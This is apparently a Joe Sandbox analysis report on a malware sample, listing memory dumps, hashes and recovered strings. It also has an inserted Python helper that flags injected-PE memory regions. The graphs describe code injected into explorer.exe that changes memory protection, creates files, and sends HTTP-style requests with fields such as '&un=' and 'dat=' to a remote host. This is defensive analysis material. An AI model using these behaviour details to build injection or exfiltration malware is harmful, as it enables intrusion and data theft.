                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: a97d8c90dfa3e1a9e16978671afeb0d1d11322fde2f13f2bf7548eaa18942065
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: f23705a2778caebd2fd550988282b2023890c7dd1cd6d94cb770af21aa92fb7b
                                            • Instruction ID: 9da5e5d859cf56466b34b19250f2271db6b829a39fec1365c4d9aaac5eaae8b1
                                            • Opcode Fuzzy Hash: f23705a2778caebd2fd550988282b2023890c7dd1cd6d94cb770af21aa92fb7b
                                            • Instruction Fuzzy Hash: B1510BB5A04116BFDB11DFACCA90A7EFBB8BB48240764C12AF4A9D7645D334DE0087E0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 08aff5b2fb936f6d9d5ea1181f4ea51a87b418e1a59109a8e5056aecfe543498
                                            • Instruction ID: 3c78b6d5b3ea40d978aebea6979ff1535c6880f56baee148499fa5df3412e4d2
                                            • Opcode Fuzzy Hash: 08aff5b2fb936f6d9d5ea1181f4ea51a87b418e1a59109a8e5056aecfe543498
                                            • Instruction Fuzzy Hash: 54510775A40645AEDB34EF6CC990A7FBBF8EF44200B44846EE4D6D7642D674DA40C770
                                            Strings
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A44787
                                            • ExecuteOptions, xrefs: 01A446A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A44725
                                            • Execute=1, xrefs: 01A44713
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A44742
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A446FC
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A44655
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 11990e0af913ab8c30fee699b9cdb3bc76e1e185d037ea92ba38979d8ac0142a
                                            • Instruction ID: c95f8afdcc1bb63f5901dc6fc06aafa82f499b5e1f293fa0fe32bcfed6f516ce
                                            • Opcode Fuzzy Hash: 11990e0af913ab8c30fee699b9cdb3bc76e1e185d037ea92ba38979d8ac0142a
                                            • Instruction Fuzzy Hash: 65512971600219ABEF12EBE9ED95FBE77B8AF58340F1400A9E606A71C1D770AA458F50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction ID: 5720094231d3bd174dbf49456cededbc274daf7a719471b0b308ff400e053b8a
                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction Fuzzy Hash: CE021671508342AFD315CF28C590A6BBBF5EFC8710F48892DFA898B264DB71E945CB52
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 121c87826b776d0e8638f422f1d1dab56420ac38766706c5f75dfe37fda1e304
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 8E81CE70E062498EEF25CF6CC8907FEBBB2AF55720F1C451AE861A7299C7348840CB71
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: 824a26d4c717123fb8a80a6b3253e4dfa87499fcf3fc74003e275e7ae974bddb
                                            • Instruction ID: 140028b690739e5b09da09d9e1f6765508f9a1cd656d1fdfa14e22a6cfed82f9
                                            • Opcode Fuzzy Hash: 824a26d4c717123fb8a80a6b3253e4dfa87499fcf3fc74003e275e7ae974bddb
                                            • Instruction Fuzzy Hash: E721627AA00219ABDB11EF79CD40BFEBBF9EF54650F54011AE905E3204E734DA11CBA1
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01A4031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A402BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A402E7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 2a1a8000d2a09dcc020bda3e5b686c773cc47f981f3a84b396ee9533295d6612
                                            • Instruction ID: e112bce265f16297322733d104f6d013948d462378df7da773b32090b7c293b2
                                            • Opcode Fuzzy Hash: 2a1a8000d2a09dcc020bda3e5b686c773cc47f981f3a84b396ee9533295d6612
                                            • Instruction Fuzzy Hash: 82E1C072604741AFD725CF28C984B6ABBE4BF88714F140A5DF6A9CB2E1D774E844CB42
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01A47BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A47B7F
                                            • RTL: Resource at %p, xrefs: 01A47B8E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: fc56a1fe3f10a0a0c07c32a091f3e3973cb187708f3e76c613ccbb7370070659
                                            • Instruction ID: af80285f56fa0de73bac64e1eaad07de98a1d7a2bb596b1edbd2ac078dc702c1
                                            • Opcode Fuzzy Hash: fc56a1fe3f10a0a0c07c32a091f3e3973cb187708f3e76c613ccbb7370070659
                                            • Instruction Fuzzy Hash: E64124753047028FD726DF29DA40B6AB7E5EF88710F100A1DFA5ADB2C0DB31E8058BA1
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A4728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 01A472C1
                                            • RTL: Resource at %p, xrefs: 01A472A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A47294
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 2c6c65d682af8360955a972a0a4f8e856a9e17b45bb06ea4cb68cd028ca879d2
                                            • Instruction ID: b2e8eab188037a644119bf9472fd6e6ea6916661b579c0f29f005f9a27c1afb0
                                            • Opcode Fuzzy Hash: 2c6c65d682af8360955a972a0a4f8e856a9e17b45bb06ea4cb68cd028ca879d2
                                            • Instruction Fuzzy Hash: FE410E75700242AFC721CF69CE41B6ABBA5FB94710F140619F955EB280DB32F8568BE1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: 809fc2e0eca5bf45a5ef1134209b374b7a761b4d02266dccac6b10598daa5fac
                                            • Instruction ID: c352495096973105c4bbf6720f3d234b094b8a7e0471636164e478c6c7c4f4bb
                                            • Opcode Fuzzy Hash: 809fc2e0eca5bf45a5ef1134209b374b7a761b4d02266dccac6b10598daa5fac
                                            • Instruction Fuzzy Hash: 32315476A002199FDB20EF2DCD50BFEB7F8EF54650F84455AE949E3240EB309A45CBA1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 00b67d8c1fb708fe9b4328deff444eb7c8b11b74cf7230780e1fbf007116c683
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 9991B171E0021A9AEB24CFADC880ABFBBB5AF44320F68551AE955E72C8D7349940CB51
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 069c9fc34bb96864f3acd27c68c63dda1179f1a17b985ad296682d90f5bd555f
                                            • Instruction ID: 9039a424e9aa4c58d3df538349283c772b450d75f1d165bcd452734908ce2eb3
                                            • Opcode Fuzzy Hash: 069c9fc34bb96864f3acd27c68c63dda1179f1a17b985ad296682d90f5bd555f
                                            • Instruction Fuzzy Hash: 21810B75D002699BDB31DB64CC45BEAB7B8AF48714F0441EAAA1DB7280D7709E85CFA0
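Every record above is taken from the same dump, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, and the report marks it "based on PE: true". The strings recovered from it (CLIENT(ntdll): ..., RTL: Enter CriticalSection Timeout ..., the ::ffff: IPv6 format strings) are ntdll's own debug and formatting strings, so the PE at 0x19A0000 in process 3 reads as a copy of ntdll rather than the sample's own image; the report does not say so, that is an analyst's inference from the strings. The helper below is an added example and is not part of the Joe Sandbox report: it decodes the numeric fields of such a dump name with the winnt.h constants and flags what a reviewer would want flagged, a PE living in writable and executable private memory instead of an image mapping. The field layout of the file name (process number, dump index, timestamp, base address, protection, state, type, trailing field) is an assumption inferred from this one name and is not documented on the page.

```python
"""Decode a Joe Sandbox .sdmp dump-file name and flag injected-PE indicators.

Added example, not code from the Joe Sandbox report.  ASSUMED name layout:
    <process>.<dump index>.<timestamp>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
Protection, state and type are decoded with the constants from winnt.h.
"""
import re
from dataclasses import dataclass
from typing import List

# winnt.h page protections (low byte) and modifier bits
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PAGE_GUARD, PAGE_NOCACHE, PAGE_WRITECOMBINE = 0x100, 0x200, 0x400

PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
MODIFIER_NAMES = {PAGE_GUARD: "PAGE_GUARD", PAGE_NOCACHE: "PAGE_NOCACHE",
                  PAGE_WRITECOMBINE: "PAGE_WRITECOMBINE"}
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
WRITABLE = {PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

MEM_COMMIT, MEM_RESERVE, MEM_FREE = 0x1000, 0x2000, 0x10000
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
STATE_NAMES = {MEM_COMMIT: "MEM_COMMIT", MEM_RESERVE: "MEM_RESERVE", MEM_FREE: "MEM_FREE"}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed field layout; hex fields are 8 digits, the base address 16, the timestamp decimal.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<idx>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<rest>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process: int      # process number as used by the report (assumed, not a Windows PID)
    dump_index: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Strip modifier bits before looking up the base protection, then append them.
        base = self.protect & 0xFF
        parts = [PROTECT_NAMES.get(base, hex(base))]
        parts += [name for bit, name in MODIFIER_NAMES.items() if self.protect & bit]
        return "|".join(parts)

    @property
    def state_name(self) -> str:
        return STATE_NAMES.get(self.state, hex(self.state))

    @property
    def type_name(self) -> str:
        return TYPE_NAMES.get(self.mem_type, hex(self.mem_type))


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split a dump-file name into its numeric fields (raises on unexpected shape)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("not a recognised .sdmp name: %s" % name)
    return DumpRegion(process=int(m["proc"], 16), dump_index=int(m["idx"], 16),
                      base=int(m["base"], 16), protect=int(m["protect"], 16),
                      state=int(m["state"], 16), mem_type=int(m["type"], 16))


def injected_pe_indicators(region: DumpRegion, based_on_pe: bool) -> List[str]:
    """Reasons an analyst would look twice at this region; empty list means nothing odd."""
    reasons = []
    base_prot = region.protect & 0xFF
    if base_prot in EXECUTABLE and base_prot in WRITABLE:
        reasons.append("writable and executable memory (%s)" % region.protect_name)
    if based_on_pe and region.mem_type != MEM_IMAGE:
        # A PE the image loader mapped is MEM_IMAGE; anything else was written by code.
        reasons.append("PE headers in %s memory, not MEM_IMAGE (not mapped by the loader)"
                       % region.type_name)
    return reasons


if __name__ == "__main__":
    # The dump name from this report, decoded.
    region = parse_sdmp_name(
        "00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp")
    print("process %d, base 0x%X, %s, %s, %s" % (region.process, region.base,
          region.protect_name, region.state_name, region.type_name))
    for reason in injected_pe_indicators(region, based_on_pe=True):
        print(" -", reason)
```

For this report's dump the decoder yields process 3, base 0x19A0000, PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, and both indicators fire; a legitimately loaded module (PAGE_EXECUTE_READ, MEM_IMAGE) produces no indicators, which is the comparison worth keeping in mind when triaging the remaining dumps of the same analysis.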

                                            Execution Graph

                                            Execution Coverage:2.3%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:4.7%
                                            Total number of Nodes:444
                                            Total number of Limit Nodes:15
execution_graph (the original report renders this as an interactive graph; the raw node/edge dump is reduced here to the information it carries: the analysed functions lie in the 0x107cxxxx-0x107dxxxx range)
• API nodes present in the graph (address, API):
• 107cd012, 107d3662, 107d50c2, 107d8f82: collapsed nodes ("6 API calls")
• 107cd328 SleepEx
• 107cd44d CreateThread
• 107cd8f2 NtProtectVirtualMemory
• 107cdf52 NtCreateFile
• 107ce082 NtCreateFile
• 107cfcb5 CreateMutexW
• 107d2352 NtCreateFile
• 107d2602 NtCreateFile
• 107d38c2 ObtainUserAgentString
• 107d3995 ObtainUserAgentString
• 107d4382 ObtainUserAgentString
• 107d55b2 socket
• 107d56b2 send
• 107d5732 connect
• 107d5788 connect
• 107d7ab2 NtProtectVirtualMemory
• 107d8232 NtCreateFile
• 107d8410 NtCreateFile
• 107d9117 getaddrinfo
• 107d97f4 setsockopt, recv
• 107d9e12 NtProtectVirtualMemory
• 107d9e45 NtProtectVirtualMemory
• Path shapes recoverable from the edges: the paths entered at 107d0ee2, 107d0fc2, 107d1102, 107d12f2 and 107d1712 call NtProtectVirtualMemory (via 107cd8f2) one or more times before reaching ObtainUserAgentString (107d4382); 107d7ab2 calls NtProtectVirtualMemory four times in a row before the same ObtainUserAgentString path; the network path entered at 107d8f7a runs socket, getaddrinfo, connect, send, then setsockopt and recv; 107cd2dd loops on SleepEx and dispatches into the NtCreateFile paths (107ce432, 107d7f12); CreateMutexW (107cfb72) and CreateThread (107cd412) are reached from 107d9bac.
13507->13509 13517 107d9022 13507->13517 13534 107d55b2 13507->13534 13510 107d9134 13509->13510 13512 107d9117 getaddrinfo 13509->13512 13509->13517 13516 107d91b2 13510->13516 13510->13517 13537 107d5732 13510->13537 13512->13510 13514 107d97f4 setsockopt recv 13514->13517 13515 107d9729 13515->13514 13515->13517 13516->13517 13540 107d56b2 13516->13540 13517->13484 13519 107d786d 13518->13519 13543 107d8232 13519->13543 13521 107d7906 13521->13483 13522 107d7888 13522->13521 13523 107d8f82 6 API calls 13522->13523 13524 107d78c5 13522->13524 13523->13524 13524->13521 13525 107d8232 NtCreateFile 13524->13525 13525->13521 13527 107d79c2 13526->13527 13528 107d8232 NtCreateFile 13527->13528 13531 107d79d6 13528->13531 13529 107d7a9f 13529->13482 13530 107d7a5d 13530->13529 13532 107d8232 NtCreateFile 13530->13532 13531->13529 13531->13530 13533 107d8f82 6 API calls 13531->13533 13532->13529 13533->13530 13535 107d55ec 13534->13535 13536 107d560a socket 13534->13536 13535->13536 13536->13509 13538 107d5788 connect 13537->13538 13539 107d576a 13537->13539 13538->13516 13539->13538 13541 107d5705 send 13540->13541 13542 107d56e7 13540->13542 13541->13515 13542->13541 13545 107d825c 13543->13545 13546 107d8334 13543->13546 13544 107d8410 NtCreateFile 13544->13546 13545->13544 13545->13546 13546->13522 13548 107ce420 13547->13548 13549 107ce0aa 13547->13549 13548->13497 13549->13548 13550 107d8232 NtCreateFile 13549->13550 13552 107ce1f9 13550->13552 13551 107ce3df 13551->13497 13552->13551 13553 107d8232 NtCreateFile 13552->13553 13554 107ce3c9 13553->13554 13555 107d8232 NtCreateFile 13554->13555 13555->13551 13557 107cdf70 13556->13557 13558 107cdf84 13556->13558 13557->13494 13559 107d8232 NtCreateFile 13558->13559 13560 107ce046 13559->13560 13560->13494 13562 107cd031 13561->13562 13563 107cd0cd 13562->13563 13564 107d8f82 6 API calls 13562->13564 13563->13504 13564->13563 13776 107daa1f 13777 107daa25 13776->13777 13780 107ce5f2 13777->13780 13779 107daa3d 13781 
107ce60e 13780->13781 13782 107ce5fb 13780->13782 13781->13779 13782->13781 13783 107d3662 6 API calls 13782->13783 13783->13781 13939 107d0dd9 13940 107d0df0 13939->13940 13941 107d4382 ObtainUserAgentString 13940->13941 13942 107d0ecd 13940->13942 13941->13942 13862 107d2cd4 13864 107d2cd8 13862->13864 13863 107d3022 13864->13863 13865 107d2352 NtCreateFile 13864->13865 13866 107d2f0d 13865->13866 13866->13863 13867 107d2792 NtCreateFile 13866->13867 13867->13866 13717 107d9e12 13718 107d8942 13717->13718 13719 107d9e45 NtProtectVirtualMemory 13718->13719 13720 107d9e70 13719->13720 13784 107ce613 13786 107ce620 13784->13786 13785 107ce67e 13786->13785 13787 107d9e12 NtProtectVirtualMemory 13786->13787 13787->13786 13737 107daa4d 13738 107daa53 13737->13738 13741 107ce782 13738->13741 13740 107daa6b 13743 107ce78f 13741->13743 13742 107ce7ad 13742->13740 13743->13742 13745 107d3662 13743->13745 13746 107d366b 13745->13746 13754 107d37ba 13745->13754 13747 107cd0f2 6 API calls 13746->13747 13746->13754 13749 107d36ee 13747->13749 13748 107d3750 13751 107d383f 13748->13751 13753 107d3791 13748->13753 13748->13754 13749->13748 13750 107d8f82 6 API calls 13749->13750 13750->13748 13752 107d8f82 6 API calls 13751->13752 13751->13754 13752->13754 13753->13754 13755 107d8f82 6 API calls 13753->13755 13754->13742 13755->13754 13788 107d9e0a 13789 107d9e45 NtProtectVirtualMemory 13788->13789 13790 107d8942 13788->13790 13791 107d9e70 13789->13791 13790->13789 13904 107d214a 13905 107d2153 13904->13905 13910 107d2174 13904->13910 13906 107d4382 ObtainUserAgentString 13905->13906 13908 107d216c 13906->13908 13907 107d21e7 13909 107cd0f2 6 API calls 13908->13909 13909->13910 13910->13907 13912 107cd1f2 13910->13912 13913 107cd2c9 13912->13913 13914 107cd20f 13912->13914 13913->13910 13915 107d7f12 7 API calls 13914->13915 13917 107cd242 13914->13917 13915->13917 13916 107cd289 13916->13913 13918 107cd0f2 6 API calls 13916->13918 13917->13916 13919 107ce432 NtCreateFile 
13917->13919 13918->13913 13919->13916 13725 107d8f82 13726 107d8fb8 13725->13726 13727 107d55b2 socket 13726->13727 13728 107d9081 13726->13728 13736 107d9022 13726->13736 13727->13728 13729 107d9134 13728->13729 13731 107d9117 getaddrinfo 13728->13731 13728->13736 13730 107d5732 connect 13729->13730 13735 107d91b2 13729->13735 13729->13736 13730->13735 13731->13729 13732 107d56b2 send 13734 107d9729 13732->13734 13733 107d97f4 setsockopt recv 13733->13736 13734->13733 13734->13736 13735->13732 13735->13736

                                            Control-flow Graph (rendered graph, nodes marked Executed / Not Executed; not reproduced here)
                                            • Function 107d8f82 (blocks 107d8f82-107d9920): creates a socket through 107d55b2, resolves the host with getaddrinfo (107d9117), connects through 107d5732, sends through 107d56b2 and reads the reply with setsockopt and recv (107d97f4). Internal helpers on the way: 107d8942, 107d5552, 107d5382, 107d57b2, 107d5e72, 107d6042, 107d6482, 107d9d62, 107d9d92, 107da002 and 107da262.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: getaddrinforecvsetsockopt
                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                            • API String ID: 1564272048-1117930895
                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction ID: 5ade831bdb9855766bae6e84df96c6cb2c262b277b9b2683e63c3a6362b7fc42
                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                            • Instruction Fuzzy Hash: A2528F34618B488BC759EF68D4847DAB7E2FB94300F50462ED49FD7246EE34B946CB81

                                            Control-flow Graph (rendered graph, nodes marked Executed / Not Executed; not reproduced here)
                                            • Function 107d8232 (blocks 107d8232-107d88cd): calls NtCreateFile at 107d8410 followed by 107d8172, and the helpers 107d8942 (on many paths) and 107d9e92.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: `
                                            • API String ID: 823142352-2679148245
                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction ID: 0f6ac74fb45f38162913efc8021b37eb9f9b8f41884aa8ed0c4da6bd7ac257e6
                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                            • Instruction Fuzzy Hash: 82224E70A18B499FCB89DF68C8996AEF7E1FB58301F51022EE45ED7250DB30E851CB85

                                            Control-flow Graph (rendered graph, nodes marked Executed / Not Executed; not reproduced here)
                                            • Function 107d9e12 (blocks 107d9e12-107d9e8f): calls 107d8942, then NtProtectVirtualMemory (107d9e67), then branches to 107d9e70 or 107d9e7d.
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 107D9E67
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction ID: 5237a3c6b08d52085ca6213b253d0783d72da869f97c31c6b2e2ed573c6b2e2d
                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                            • Instruction Fuzzy Hash: 1F01B134628B884F8788EFACE48512AB7E4FBCD314F000B3EE99AC3250EB70D5414742

                                            Control-flow Graph (rendered graph, nodes marked Executed / Not Executed; not reproduced here)
                                            • Function 107d9e0a (blocks 107d9e0a-107d9e8f, overlapping the 107d9e12 routine): optionally calls 107d8942 at 107d9e40, then NtProtectVirtualMemory (107d9e67), then branches to 107d9e70 or 107d9e7d.
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL ref: 107D9E67
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4461233619.00000000106E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 106E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_106e0000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: 2acc176fdabe450e145c0743b07f107eff4ff8c26a19d927515bfa0207b2621b
